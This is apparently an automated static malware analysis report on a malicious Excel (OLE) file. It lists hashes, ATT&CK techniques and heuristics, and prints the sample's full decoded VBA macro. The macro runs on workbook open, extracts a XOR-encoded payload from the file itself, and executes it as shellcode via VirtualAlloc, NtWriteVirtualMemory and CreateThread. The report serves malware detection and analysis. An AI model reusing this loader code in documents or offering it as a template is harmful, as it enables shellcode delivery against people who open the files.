Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ffa1a921af653e73…

MALICIOUS

Office (OLE)

38.6 KB Created: 2017-07-26 21:52:58 Authoring application: Microsoft Excel First seen: 2017-08-08
MD5: c7b35d69ba198ea9337b077427ac869d SHA-1: 864982a2b3809308ea6c61f96162233cf4f0944a SHA-256: ffa1a921af653e733f3d6a59c7c6d299aa9a72462ac9d0c8d14a1678fd364221
78 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File: User Execution: Malicious Macro

The file contains both VBA and Excel 4.0 (XLM) macros, with Workbook_Open and Document_Open heuristics firing. The VBA macro attempts to use VirtualAlloc and CreateThread, indicating it likely allocates memory and executes shellcode. The presence of obfuscated script names and the use of Windows API calls suggest a downloader or dropper functionality.

Heuristics 6

  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
        raHdABOeZHybFUqnxMvUML
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
        Document_Open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 172 bytes
SHA-256: 63d3437f0ef9d6e6f7cafadd6a5473d8826a0decff0e7e519719b73893f4ae2d
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Makro
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4702 bytes
SHA-256: dade35c58122e76a9a8383fdb73fd13a8d23a273f6b5a2268ffacbb32f2b52f7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
39 of 71 identifiers look randomly generated (e.g. 'haJVowPdLioiEJsWdFBQHWTYsmvjmYTVPqgpmXJX') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "BuÇalışmaKitabı"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

#If VBA7 Then
Private Declare PtrSafe Function bqEDQaVZHp Lib "kernel32" Alias "CreateThread" (ByVal GnoZFFcUTHyivIoyiT As Long, ByVal DsFGfvuEzTNzktrXHao As Long, ByVal NgqSJbdGhvTcOAXkbHiElaDafinOe As LongPtr, GyTUQxcMWerNxeZLKKvhVaR As Long, ByVal OMDpNBNpCvOviUJAhoKenx As Long, yauyDsWPGGjgeUMZvqb As Long) As LongPtr
Private Declare PtrSafe Function wqieosdkWGFhPYNFGvppOln Lib "kernel32" Alias "VirtualAlloc" (ByVal vHDVbI As Long, ByVal OvgKRRHcSOTphyBmnvEDF As LongPtr, ByVal dtuUzBNLSZlpBLPjcZ As Long, ByVal pucRoLDTvpz As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal fclrNqWsgohWUdS As LongPtr, ByVal QwdsFppibBfiVHsvsCgmptcTgHha As LongPtr, ByVal gXkTGcZmhRP As String, ByVal dqmkNwyWMDrXFHxujmXhoVU As LongPtr, ByRef VooEsilLrzmcPJskIeB As LongPtr) As LongPtr
#Else
Private Declare Function bqEDQaVZHp Lib "kernel32" Alias "CreateThread"  (ByVal GnoZFFcUTHyivIoyiT As Long, ByVal DsFGfvuEzTNzktrXHao As Long, ByVal NgqSJbdGhvTcOAXkbHiElaDafinOe As Long, GyTUQxcMWerNxeZLKKvhVaR As Long, ByVal OMDpNBNpCvOviUJAhoKenx As Long, yauyDsWPGGjgeUMZvqb As Long) As Long
Private Declare Function wqieosdkWGFhPYNFGvppOln Lib "kernel32" Alias "VirtualAlloc" (ByVal vHDVbI As Long, ByVal OvgKRRHcSOTphyBmnvEDF As Long, ByVal dtuUzBNLSZlpBLPjcZ As Long, ByVal pucRoLDTvpz As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal fclrNqWsgohWUdS As Long, ByVal QwdsFppibBfiVHsvsCgmptcTgHha As Long, ByVal gXkTGcZmhRP As String, ByVal dqmkNwyWMDrXFHxujmXhoVU As Long, ByRef VooEsilLrzmcPJskIeB As Long) As Long
#End If

Const BQtsEMXQdQ = &H1000
Const kxiEEplHEtFygBTjeOIiho = &H40

Public Sub raHdABOeZHybFUqnxMvUML()
    Dim VuQRdWV() As Byte

    VuQRdWV = CokBrkmkOTTa(ActiveWorkbook.FullName)
    Dim jyjPJ As String
    jyjPJ = StrConv(VuQRdWV, 64)
    
    Dim CKEcHyHGwDDAHLySoXFU
    CKEcHyHGwDDAHLySoXFU = Split(jyjPJ, "haJVowPdLioiEJsWdFBQHWTYsmvjmYTVPqgpmXJXfIwlwlknBMgwIHAlhLCbaGQMossoDcJfVDKYAIBhbiHASwniQUiBvHWz")

    Dim JKKLidHoCwfHIVbRSfnyoYm As String
    Dim USPbaXBGT As String
    Dim XefQKouerNuRsviD As String
    USPbaXBGT = StrConv(StrConv(CKEcHyHGwDDAHLySoXFU(UBound(CKEcHyHGwDDAHLySoXFU)), 64), 128)
    XefQKouerNuRsviD = Mid$(USPbaXBGT, 3, Len(USPbaXBGT))

    JKKLidHoCwfHIVbRSfnyoYm = iEBUuBXDakOwcUky("JWeSWJycaBeXCLyjuaSYqURekx", XefQKouerNuRsviD)
    
    #If VBA7 Then
        Dim zXQUeXNBXvoNaUW As LongPtr
        Dim gWUTRWrnQLDT As LongPtr
    #Else
        Dim zXQUeXNBXvoNaUW As Long
        Dim gWUTRWrnQLDT As Long
    #End If

    zXQUeXNBXvoNaUW = wqieosdkWGFhPYNFGvppOln(0, Len(JKKLidHoCwfHIVbRSfnyoYm), BQtsEMXQdQ, kxiEEplHEtFygBTjeOIiho)
    gWUTRWrnQLDT = NtWriteVirtualMemory(-1, zXQUeXNBXvoNaUW, JKKLidHoCwfHIVbRSfnyoYm, Len(JKKLidHoCwfHIVbRSfnyoYm), 0)
    gWUTRWrnQLDT = bqEDQaVZHp(0, 0, zXQUeXNBXvoNaUW, 0, 0, 0)
End Sub

Public Function CokBrkmkOTTa(ByVal qyuarThySZQwawRswxLxviUTfWs As String) As Byte()
    Dim USPbaXBGT As Long
    Dim XefQKouerNuRsviD() As Byte
    USPbaXBGT = FreeFile
    If LenB(Dir(qyuarThySZQwawRswxLxviUTfWs)) Then
        Open qyuarThySZQwawRswxLxviUTfWs For Binary Access Read As USPbaXBGT
        ReDim XefQKouerNuRsviD(LOF(USPbaXBGT) - 1&) As Byte
        Get USPbaXBGT, , XefQKouerNuRsviD
        Close USPbaXBGT
    Else
        Err.Raise 53
    End If
    CokBrkmkOTTa = XefQKouerNuRsviD
    Erase XefQKouerNuRsviD
End Function

Public Sub Document_Open()
    raHdABOeZHybFUqnxMvUML
End Sub

Sub Workbook_Open()
    Document_Open
End Sub

Public Function iEBUuBXDakOwcUky(AGrFyFzaFEPdAtSxztcsDCCinJdFI As String, TjsuUBlTJYbT As String) As String
    Dim WhAzRWYDAiguXdjrOCUrqLGK As Long
    Dim yrlFJeq As String
    Dim NGaNjmJKLsbmZXxcBVwhBy As Integer, iwQHCxWirTNQVPyGsf As Integer, a As Long

    For WhAzRWYDAiguXdjrOCUrqLGK = 1 To Len(TjsuUBlTJYbT)
        a = WhAzRWYDAiguXdjrOCUrqLGK Mod Len(AGrFyFzaFEPdAtSxztcsDCCinJdFI)
        If a = 0 Then a = Len(AGrFyFzaFEPdAtSxztcsDCCinJdFI)
        
        NGaNjmJKLsbmZXxcBVwhBy = Asc(Mid$(TjsuUBlTJYbT, WhAzRWYDAiguXdjrOCUrqLGK, 1))
        iwQHCxWirTNQVPyGsf = Asc(Mid$(AGrFyFzaFEPdAtSxztcsDCCinJdFI, a, 1))
        yrlFJeq = yrlFJeq + Chr(NGaNjmJKLsbmZXxcBVwhBy Xor iwQHCxWirTNQVPyGsf)
    Next WhAzRWYDAiguXdjrOCUrqLGK
    
   iEBUuBXDakOwcUky = yrlFJeq
End Function